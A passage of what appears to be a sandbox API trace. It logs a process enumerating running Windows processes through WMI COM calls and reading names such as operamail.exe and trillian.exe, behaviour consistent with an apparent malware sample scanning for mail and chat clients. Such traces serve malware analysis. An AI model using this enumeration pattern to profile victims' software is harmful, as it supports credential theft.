[0279.554] WbemDefPath:IUnknown:Release (This=0x570e2a8) returned 0x1 [0279.554] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e2a8, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e2a8) returned 0x0 [0279.554] WbemDefPath:IUnknown:AddRef (This=0x570e2a8) returned 0x3 [0279.554] WbemDefPath:IUnknown:Release (This=0x570e2a8) returned 0x2 [0279.554] WbemDefPath:IWbemPath:SetText (This=0x570e2a8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3020\"") returned 0x0 [0279.554] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.554] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.555] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.555] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.555] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.555] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.556] IWbemClassObject:Get (in: This=0x5712728, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d0e60*=0, plFlavor=0x27d0e64*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="operamail.exe", varVal2=0x0), pType=0x27d0e60*=8, plFlavor=0x27d0e64*=0) returned 0x0 [0279.556] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0279.556] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0279.556] IWbemClassObject:Get (in: This=0x5712728, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d0e60*=8, plFlavor=0x27d0e64*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="operamail.exe", varVal2=0x0), pType=0x27d0e60*=8, plFlavor=0x27d0e64*=0) returned 0x0 [0279.556] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0279.556] SysStringByteLen (bstr="operamail.exe") returned 0x1a [0279.556] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x570b2b8, puReturned=0x27bb39c | out: apObjects=0x570b2b8*=0x57128c0, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.557] IUnknown:QueryInterface (in: This=0x57128c0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x57128c0) returned 0x0 [0279.557] IUnknown:QueryInterface (in: This=0x57128c0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.557] IUnknown:QueryInterface (in: This=0x57128c0, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.558] IUnknown:AddRef (This=0x57128c0) returned 0x3 [0279.558] IUnknown:QueryInterface (in: This=0x57128c0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.558] IUnknown:QueryInterface (in: This=0x57128c0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.558] IUnknown:QueryInterface (in: This=0x57128c0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x57128c4) returned 0x0 [0279.558] IMarshal:GetUnmarshalClass (in: This=0x57128c4, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.558] IUnknown:Release (This=0x57128c4) returned 0x3 [0279.558] IUnknown:QueryInterface (in: This=0x57128c0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.559] IUnknown:Release (This=0x57128c0) returned 0x2 [0279.559] IUnknown:QueryInterface (in: This=0x57128c0, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x57128c0) returned 0x0 [0279.559] IUnknown:AddRef (This=0x57128c0) returned 0x4 [0279.559] IUnknown:Release (This=0x57128c0) returned 0x3 [0279.559] IUnknown:Release (This=0x57128c0) returned 0x2 [0279.559] CoTaskMemFree (pv=0x570b2b8) [0279.559] IUnknown:AddRef (This=0x57128c0) returned 0x3 [0279.559] IWbemClassObject:Get (in: This=0x57128c0, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.560] IWbemClassObject:Get (in: This=0x57128c0, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.560] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"") returned 0x66 [0279.560] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"") returned 0x66 [0279.561] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.561] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.561] IUnknown:Release (This=0x500344) returned 0x1 [0279.562] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x570b2b8) returned 0x0 [0279.562] WbemDefPath:IUnknown:QueryInterface (in: This=0x570b2b8, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.562] WbemDefPath:IClassFactory:CreateInstance (in: This=0x570b2b8, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e388) returned 0x0 [0279.562] WbemDefPath:IUnknown:Release (This=0x570b2b8) returned 0x0 [0279.562] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e388, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e388) returned 0x0 [0279.562] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e388, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.563] WbemDefPath:IUnknown:AddRef (This=0x570e388) returned 0x3 [0279.563] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e388, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.563] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e388, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.563] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e388, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x570b2c8) returned 0x0 [0279.563] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x570b2c8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.563] WbemDefPath:IUnknown:Release (This=0x570b2c8) returned 0x3 [0279.564] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e388, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.564] WbemDefPath:IUnknown:Release (This=0x570e388) returned 0x2 [0279.564] WbemDefPath:IUnknown:Release (This=0x570e388) returned 0x1 [0279.564] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e388, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e388) returned 0x0 [0279.564] WbemDefPath:IUnknown:AddRef (This=0x570e388) returned 0x3 [0279.564] WbemDefPath:IUnknown:Release (This=0x570e388) returned 0x2 [0279.564] WbemDefPath:IWbemPath:SetText (This=0x570e388, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3028\"") returned 0x0 [0279.564] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.564] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.564] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.564] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.564] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.565] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea68*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.565] IWbemClassObject:Get (in: This=0x57128c0, wszName="Name", lFlags=0, pVal=0x43ea68*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d16d4*=0, plFlavor=0x27d16d8*=0 | out: pVal=0x43ea68*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="trillian.exe", varVal2=0x0), pType=0x27d16d4*=8, plFlavor=0x27d16d8*=0) returned 0x0 [0279.565] SysStringByteLen (bstr="trillian.exe") returned 0x18 [0279.565] IWbemClassObject:Get (in: This=0x57128c0, wszName="Name", lFlags=0, pVal=0x43ea70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x27d16d4*=8, plFlavor=0x27d16d8*=0 | out: pVal=0x43ea70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="trillian.exe", varVal2=0x0), pType=0x27d16d4*=8, plFlavor=0x27d16d8*=0) returned 0x0 [0279.565] IEnumWbemClassObject:Next (in: This=0x5115f8, lTimeout=-1, uCount=0x1, apObjects=0x5716070, puReturned=0x27bb39c | out: apObjects=0x5716070*=0x5712a58, puReturned=0x27bb39c*=0x1) returned 0x0 [0279.566] IUnknown:QueryInterface (in: This=0x5712a58, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e0cc | out: ppvObject=0x43e0cc*=0x5712a58) returned 0x0 [0279.566] IUnknown:QueryInterface (in: This=0x5712a58, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e080 | out: ppvObject=0x43e080*=0x0) returned 0x80004002 [0279.566] IUnknown:QueryInterface (in: This=0x5712a58, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43dea8 | out: ppvObject=0x43dea8*=0x0) returned 0x80004002 [0279.567] IUnknown:AddRef (This=0x5712a58) returned 0x3 [0279.567] IUnknown:QueryInterface (in: This=0x5712a58, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43d9dc | out: ppvObject=0x43d9dc*=0x0) returned 0x80004002 [0279.567] IUnknown:QueryInterface (in: This=0x5712a58, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43d98c | out: ppvObject=0x43d98c*=0x0) returned 0x80004002 [0279.567] IUnknown:QueryInterface (in: This=0x5712a58, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43d998 | out: ppvObject=0x43d998*=0x5712a5c) returned 0x0 [0279.567] IMarshal:GetUnmarshalClass (in: This=0x5712a5c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43d9a0 | out: pCid=0x43d9a0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0279.567] IUnknown:Release (This=0x5712a5c) returned 0x3 [0279.567] IUnknown:QueryInterface (in: This=0x5712a58, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43de8c | out: ppvObject=0x43de8c*=0x0) returned 0x80004002 [0279.568] IUnknown:Release (This=0x5712a58) returned 0x2 [0279.568] IUnknown:QueryInterface (in: This=0x5712a58, riid=0x43e424*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x43e420 | out: ppvObject=0x43e420*=0x5712a58) returned 0x0 [0279.568] IUnknown:AddRef (This=0x5712a58) returned 0x4 [0279.568] IUnknown:Release (This=0x5712a58) returned 0x3 [0279.568] IUnknown:Release (This=0x5712a58) returned 0x2 [0279.568] CoTaskMemFree (pv=0x5716070) [0279.568] IUnknown:AddRef (This=0x5712a58) returned 0x3 [0279.568] IWbemClassObject:Get (in: This=0x5712a58, wszName="__GENUS", lFlags=0, pVal=0x43ea64*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eae4*=0, plFlavor=0x43eae0*=0 | out: pVal=0x43ea64*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x43eae4*=3, plFlavor=0x43eae0*=64) returned 0x0 [0279.569] IWbemClassObject:Get (in: This=0x5712a58, wszName="__PATH", lFlags=0, pVal=0x43ea48*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x43eacc*=0, plFlavor=0x43eac8*=0 | out: pVal=0x43ea48*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3036\"", varVal2=0x0), pType=0x43eacc*=8, plFlavor=0x43eac8*=64) returned 0x0 [0279.569] IComThreadingInfo:GetCurrentApartmentType (in: This=0x500344, pAptType=0x43ea6c | out: pAptType=0x43ea6c*=1) returned 0x0 [0279.569] IUnknown:QueryInterface (in: This=0x500344, riid=0x277dfcc*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x43ea70 | out: ppvObject=0x43ea70*=0x0) returned 0x80004002 [0279.569] IUnknown:Release (This=0x500344) returned 0x1 [0279.570] CoGetClassObject (in: rclsid=0x5aa304*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x43e3e0 | out: ppv=0x43e3e0*=0x5716070) returned 0x0 [0279.570] WbemDefPath:IUnknown:QueryInterface (in: This=0x5716070, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x43e5f8 | out: ppvObject=0x43e5f8*=0x0) returned 0x80004002 [0279.571] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5716070, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e604 | out: ppvObject=0x43e604*=0x570e468) returned 0x0 [0279.571] WbemDefPath:IUnknown:Release (This=0x5716070) returned 0x0 [0279.571] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e468, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43e224 | out: ppvObject=0x43e224*=0x570e468) returned 0x0 [0279.571] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e468, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x43e1d8 | out: ppvObject=0x43e1d8*=0x0) returned 0x80004002 [0279.571] WbemDefPath:IUnknown:AddRef (This=0x570e468) returned 0x3 [0279.571] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e468, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x43db34 | out: ppvObject=0x43db34*=0x0) returned 0x80004002 [0279.571] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e468, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x43dae4 | out: ppvObject=0x43dae4*=0x0) returned 0x80004002 [0279.571] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e468, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43daf0 | out: ppvObject=0x43daf0*=0x5716080) returned 0x0 [0279.572] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5716080, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x43daf8 | out: pCid=0x43daf8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0279.572] WbemDefPath:IUnknown:Release (This=0x5716080) returned 0x3 [0279.572] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e468, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x43dfe4 | out: ppvObject=0x43dfe4*=0x0) returned 0x80004002 [0279.572] WbemDefPath:IUnknown:Release (This=0x570e468) returned 0x2 [0279.572] WbemDefPath:IUnknown:Release (This=0x570e468) returned 0x1 [0279.572] WbemDefPath:IUnknown:QueryInterface (in: This=0x570e468, riid=0x43e924*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x43e920 | out: ppvObject=0x43e920*=0x570e468) returned 0x0 [0279.572] WbemDefPath:IUnknown:AddRef (This=0x570e468) returned 0x3 [0279.572] WbemDefPath:IUnknown:Release (This=0x570e468) returned 0x2 [0279.573] WbemDefPath:IWbemPath:SetText (This=0x570e468, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"3036\"") returned 0x0 [0279.573] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43eaa0 | out: puCount=0x43eaa0*=0x2) returned 0x0 [0279.573] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0x0, pszText=0x0 | out: puBuffLength=0x43ea9c*=0xf, pszText=0x0) returned 0x0 [0279.573] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea9c*=0xf, pszText="00000000000000" | out: puBuffLength=0x43ea9c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0279.573] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5a8ed8, puCount=0x43ea6c | out: puCount=0x43ea6c*=0x2) returned 0x0 [0279.573] WbemDefPath:IWbemPath:GetText (in: This=0x5a8ed8, lFlags=4, puBuffLength=0x43ea68*=0x0, pszText=0x0 | out: puBuffLength=0x43ea68*=0xf, pszText=0x0) returned 0x0 [0279.573] WbemDefPath:IWbemPath:GetText 